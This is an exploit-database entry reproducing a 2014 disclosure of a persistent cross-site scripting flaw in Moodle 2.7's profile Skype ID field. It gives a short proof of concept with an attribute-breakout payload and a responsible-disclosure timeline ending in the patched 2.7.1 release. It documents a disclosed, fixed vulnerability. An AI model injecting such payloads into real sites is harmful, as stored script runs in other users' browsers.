[] NeoSense
E X P L O I T S
title author type platform port cve id

Moodle 2.7 - Persistent Cross-Site Scripting

Author: Osanda Malith Jayathissa
type: webapps
platform: php
port: 
date_added: 2014-07-27 
date_updated: 2014-07-27 
verified: 0 
codes: CVE-2014-3544;OSVDB-109337 
tags: 
aliases:  
screenshot_url:  
application_url: 
Title: Moodle 2.7 Persistent XSS
Vendor: https://moodle.org/
Moodle advisory: https://moodle.org/mod/forum/discuss.php?d=264265
Researched by: Osanda Malith Jayathissa (@OsandaMalith)
E-Mail: osanda[cat]unseen.is
Original write-up: http://osandamalith.wordpress.com/2014/07/25/moodle-2-7-persistent-xss/

[-] POC
================

1. Edit your profile
2. Click Optional
3. In Skype ID field inject this payload

x" onload="prompt('XSS by Osanda')">"

[-] Disclosure Timeline
========================

2014-05-24: Responsibly disclosed to the Vendor
2014-05-27: Suggested a fix
2014-06-04: Fix got accepted
2014-07-21: Vendor releases a security announcement
2014-07-24: Released Moodle 2.7.1 stable with all patches
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.